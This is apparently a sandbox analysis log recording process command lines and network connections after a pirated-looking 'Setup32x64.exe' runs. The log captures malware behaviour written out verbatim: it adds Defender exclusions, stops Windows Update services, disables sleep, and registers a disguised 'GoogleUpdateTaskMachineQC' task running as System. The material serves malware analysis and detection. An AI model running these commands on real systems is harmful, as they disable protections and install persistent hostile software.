"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=154 --mojo-platform-channel-handle=6560 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=155 --mojo-platform-channel-handle=8016 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=156 --mojo-platform-channel-handle=9860 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=158 --mojo-platform-channel-handle=4932 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=157 --mojo-platform-channel-handle=9024 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=159 --mojo-platform-channel-handle=8800 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10172 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\FILES-S0ft\" -ad -an -ai#7zMap5638:82:7zEvent10304
C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe
"C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\611877ca519b4bfbbd294e507598fbfb /t 8720 /p 8716
C:\ProgramData\19965126155501944123.exe
"C:\ProgramData\19965126155501944123.exe"
C:\ProgramData\86996301282502183715.exe
"C:\ProgramData\86996301282502183715.exe"
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\delta1\mbupdatrV5.exe
"C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\delta1\mbupdatrV5.exe" "C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\config\UpdateControllerConfig.json" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\staging" /db:dbupdate /su:no
C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe
"C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-0.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-1.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-2.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-3.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-4.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-5.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-6.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-7.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-8.exe
ig.exe reseed
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7424 -ip 7424
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-9.exe
ig.exe reseed
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7424 -s 1756
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-10.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-11.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-12.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-13.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-14.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-15.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-16.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-17.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-18.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-19.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-20.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-21.exe
ig.exe reseed
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-22.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-23.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-24.exe
ig.exe reseed
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-25.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-26.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-27.exe
ig.exe reseed
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-28.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-29.exe
ig.exe reseed
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-30.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-31.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-32.exe
ig.exe reseed
C:\Windows\System32\sc.exe
sc stop bits
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-33.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-34.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-35.exe
ig.exe reseed
C:\Windows\System32\sc.exe
sc stop dosvc
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-36.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-37.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-38.exe
ig.exe reseed
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ewltjtjow#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-39.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-40.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-41.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-42.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-43.exe
ig.exe reseed
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-44.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-45.exe
ig.exe reseed
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-46.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-47.exe
ig.exe reseed
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-48.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-49.exe
ig.exe reseed
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ewltjtjow#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
Network
| Country | Destination | Domain | Proto |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 104.18.29.38:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | w.clarity.ms | udp |
| US | 23.96.124.156:443 | w.clarity.ms | tcp |
| US | 8.8.8.8:53 | 38.29.18.104.in-addr.arpa | udp |
| US | 23.96.124.156:443 | w.clarity.ms | tcp |
| US | 8.8.8.8:53 | c.clarity.ms | udp |
| IE | 68.219.88.97:443 | c.clarity.ms | tcp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.250.179.202:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 156.124.96.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.88.219.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | privacyportal-eu.onetrust.com | udp |
| US | 104.18.28.38:443 | privacyportal-eu.onetrust.com | tcp |
| US | 8.8.8.8:53 | webcompanion.com | udp |
| US | 104.18.212.25:443 | webcompanion.com | tcp |
| US | 104.18.212.25:443 | webcompanion.com | tcp |
| US | 8.8.8.8:53 | 25.212.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geo.lavasoft.com | udp |
| US | 104.17.9.52:80 | geo.lavasoft.com | tcp |
| US | 8.8.8.8:53 | 52.9.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | featureflags.lavasoft.com | udp |
| US | 104.17.9.52:443 | featureflags.lavasoft.com | tcp |
| US | 8.8.8.8:53 | flwadw.com | udp |
| US | 104.18.13.11:443 | flwadw.com | tcp |
| US | 8.8.8.8:53 | 11.13.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wcdownloadercdn.lavasoft.com | udp |
| US | 104.17.8.52:80 | wcdownloadercdn.lavasoft.com | tcp |
| US | 8.8.8.8:53 | 52.8.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e2c66.gcp.gvt2.com | udp |
| US | 34.166.9.70:443 | e2c66.gcp.gvt2.com | tcp |
| US | 104.17.9.52:80 | wcdownloadercdn.lavasoft.com | tcp |
| US | 8.8.8.8:53 | 70.9.166.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.26.24.184.in-addr.arpa | udp |
| US | 104.17.9.52:443 | wcdownloadercdn.lavasoft.com | tcp |
| US | 104.18.13.11:443 | flwadw.com | tcp |
| US | 8.8.8.8:53 | wc-partners.lavasoft.com | udp |
| CA | 64.18.87.81:80 | wc-partners.lavasoft.com | tcp |
| US | 8.8.8.8:53 | 81.87.18.64.in-addr.arpa | udp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| US | 104.26.13.224:443 | release-cdn.onelaunch.com | tcp |
| US | 104.26.13.224:443 | release-cdn.onelaunch.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| NL | 142.251.36.46:80 | clients2.google.com | tcp |
| NL | 142.251.36.46:80 | clients2.google.com | tcp |
| NL | 142.250.179.163:443 | update.googleapis.com | tcp |
| US | 8.8.8.8:53 | api.keen.io | udp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| US | 8.8.8.8:53 | 163.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.254.35.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onenews.com | udp |
| US | 8.8.8.8:53 | onenews.com | udp |
| US | 104.26.5.199:443 | onenews.com | tcp |
| US | 8.8.8.8:53 | 199.5.26.104.in-addr.arpa | udp |
| US | 172.67.186.30:443 | geteasypdf.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | static.slickdealscdn.com | udp |
| US | 104.18.23.62:443 | static.slickdealscdn.com | tcp |
| US | 8.8.8.8:53 | 62.23.18.104.in-addr.arpa | udp |
| NL | 142.250.102.155:443 | stats.g.doubleclick.net | udp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | udp |
| NL | 142.251.36.2:443 | googleads.g.doubleclick.net | udp |
| US | 104.26.5.199:443 | onenews.com | tcp |
| US | 8.8.8.8:53 | chrmxtnsnhdnnlnch.onelaunch.com | udp |
| US | 8.8.8.8:53 | chrmxtnsnhdnnlnch.onelaunch.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | optimizationguide-pa.googleapis.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| US | 104.26.12.224:443 | chrmxtnsnhdnnlnch.onelaunch.com | tcp |
| NL | 172.217.168.202:443 | optimizationguide-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | webcompanion.com | udp |
| US | 104.18.211.25:80 | webcompanion.com | tcp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.12.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.211.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | extensions-cdn.onelaunch.com | udp |
| US | 8.8.8.8:53 | extensions-cdn.onelaunch.com | udp |
| US | 104.26.12.224:443 | extensions-cdn.onelaunch.com | tcp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| US | 104.26.13.224:443 | extensions-cdn.onelaunch.com | tcp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:80 | youtube.com | tcp |
| NL | 216.58.214.14:80 | youtube.com | tcp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | 14.214.58.216.in-addr.arpa | udp |
| NL | 216.58.214.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | cdn.inspectlet.com | udp |
| US | 172.67.10.172:443 | cdn.inspectlet.com | tcp |
| US | 8.8.8.8:53 | hn.inspectlet.com | udp |
| NL | 142.250.179.202:443 | optimizationguide-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 172.10.67.172.in-addr.arpa | udp |
| US | 104.17.9.52:443 | wcdownloadercdn.lavasoft.com | tcp |
| US | 8.8.8.8:53 | api.accuweather.com | udp |
| NL | 23.72.252.64:80 | api.accuweather.com | tcp |
| US | 8.8.8.8:53 | 64.252.72.23.in-addr.arpa | udp |
| US | 104.18.13.11:443 | flwadw.com | tcp |
| US | 35.190.25.25:443 | api.mixpanel.com | tcp |
| NL | 23.72.252.64:443 | api.accuweather.com | tcp |
| NL | 23.72.252.64:443 | api.accuweather.com | tcp |
| US | 8.8.8.8:53 | sg-bitmask.adaware.com | udp |
| US | 52.35.254.249:443 | api.keen.io | tcp |
| US | 104.18.68.73:443 | sg-bitmask.adaware.com | tcp |
| US | 8.8.8.8:53 | 73.68.18.104.in-addr.arpa | udp |
| US | 104.26.13.224:443 | extensions-cdn.onelaunch.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| NL | 216.58.214.14:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | facebook.com | udp |
| GB | 157.240.221.35:443 | facebook.com | tcp |
| US | 8.8.8.8:53 | 35.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| GB | 157.240.221.35:443 | facebook.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 157.240.221.16:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | edgedl.me.gvt1.com | udp |
| US | 34.104.35.123:80 | edgedl.me.gvt1.com | tcp |
| US | 8.8.8.8:53 | reddit.com | udp |
| US | 151.101.193.140:443 | reddit.com | tcp |
| US | 151.101.193.140:443 | reddit.com | tcp |
| US | 151.101.193.140:443 | reddit.com | tcp |
| US | 151.101.193.140:443 | reddit.com | tcp |
| US | 151.101.193.140:443 | reddit.com | tcp |
| US | 8.8.8.8:53 | www.reddit.com | udp |
| US | 151.101.1.140:443 | www.reddit.com | tcp |
| US | 8.8.8.8:53 | 123.35.104.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.193.101.151.in-addr.arpa | udp |
| IN | 142.250.183.131:443 | id.google.com | udp |
| US | 151.101.1.140:443 | www.reddit.com | tcp |
| US | 8.8.8.8:53 | en.wikipedia.org | udp |
| NL | 91.198.174.192:443 | en.wikipedia.org | tcp |
| US | 8.8.8.8:53 | 192.174.198.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| NL | 142.251.36.1:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | 65.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 152.199.24.185:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | 185.24.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ebay.com | udp |
| US | 209.140.136.254:443 | ebay.com | tcp |
| US | 8.8.8.8:53 | www.ebay.com | udp |
| NL | 104.85.5.31:443 | www.ebay.com | tcp |
| NL | 104.85.5.31:80 | www.ebay.com | tcp |
| US | 8.8.8.8:53 | pages.ebay.com | udp |
| NL | 104.85.5.128:80 | pages.ebay.com | tcp |
| NL | 104.85.5.128:443 | pages.ebay.com | tcp |
| US | 8.8.8.8:53 | 254.136.140.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.5.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.5.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.57.101:443 | static.cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | 101.57.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | cloudflareinsights.com | udp |
| US | 104.16.56.101:443 | cloudflareinsights.com | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 209.140.136.254:443 | ebay.com | tcp |
| US | 8.8.8.8:53 | 101.56.16.104.in-addr.arpa | udp |
| NL | 104.85.5.31:443 | www.ebay.com | tcp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | instagram.com | udp |
| GB | 157.240.221.174:443 | instagram.com | tcp |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| NL | 157.240.201.174:443 | www.instagram.com | tcp |
| GB | 157.240.221.174:443 | instagram.com | tcp |
| US | 8.8.8.8:53 | widgets.outbrain.com | udp |
| US | 8.8.8.8:53 | widgets.outbrain.com | udp |
| NL | 104.85.1.87:443 | widgets.outbrain.com | tcp |
| US | 8.8.8.8:53 | olntptiles.tiles.ampfeed.com | udp |
| US | 8.8.8.8:53 | olntptiles.tiles.ampfeed.com | udp |
| NL | 23.222.35.120:443 | olntptiles.tiles.ampfeed.com | tcp |
| NL | 157.240.201.174:443 | www.instagram.com | tcp |
| US | 8.8.8.8:53 | static.cdninstagram.com | udp |
| GB | 157.240.221.63:443 | static.cdninstagram.com | tcp |
| US | 8.8.8.8:53 | 174.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.201.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.35.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | netflix.com | udp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 8.8.8.8:53 | suggestqueries-clients6.youtube.com | udp |
| NL | 172.217.168.206:443 | suggestqueries-clients6.youtube.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| NL | 172.217.168.206:443 | suggestqueries-clients6.youtube.com | udp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 8.8.8.8:53 | 63.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.157.211.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.168.217.172.in-addr.arpa | udp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| NL | 172.217.168.206:443 | suggestqueries-clients6.youtube.com | udp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| US | 3.211.157.115:443 | netflix.com | tcp |
| NL | 142.250.179.132:443 | t3.gstatic.com | tcp |
| US | 8.8.8.8:53 | linkedin.com | udp |
| US | 13.107.42.14:443 | linkedin.com | tcp |
| US | 13.107.42.14:443 | linkedin.com | tcp |
| US | 13.107.42.14:443 | linkedin.com | tcp |
| US | 8.8.8.8:53 | 132.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tcheck.outbrainimg.com | udp |
| US | 8.8.8.8:53 | tcheck.outbrainimg.com | udp |
| US | 23.36.245.141:443 | tcheck.outbrainimg.com | tcp |
| US | 8.8.8.8:53 | widget-pixels.outbrain.com | udp |
| US | 8.8.8.8:53 | widget-pixels.outbrain.com | udp |
| US | 13.107.42.14:443 | linkedin.com | tcp |
| US | 8.8.8.8:53 | 141.245.36.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.googleoptimize.com | udp |
| US | 8.8.8.8:53 | www.googleoptimize.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| NL | 142.250.102.154:443 | stats.g.doubleclick.net | tcp |
| NL | 142.250.102.154:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.licdn.com | udp |
| US | 13.107.246.67:443 | static.licdn.com | tcp |
| US | 8.8.8.8:53 | outlook.live.com | udp |
| NL | 52.97.250.210:443 | outlook.live.com | tcp |
| US | 8.8.8.8:53 | twitch.tv | udp |
| US | 151.101.130.167:443 | twitch.tv | tcp |
| US | 8.8.8.8:53 | www.twitch.tv | udp |
| NL | 199.232.150.167:443 | www.twitch.tv | tcp |
| US | 151.101.130.167:443 | twitch.tv | tcp |
| US | 8.8.8.8:53 | 154.102.250.142.in-addr.arpa | udp |
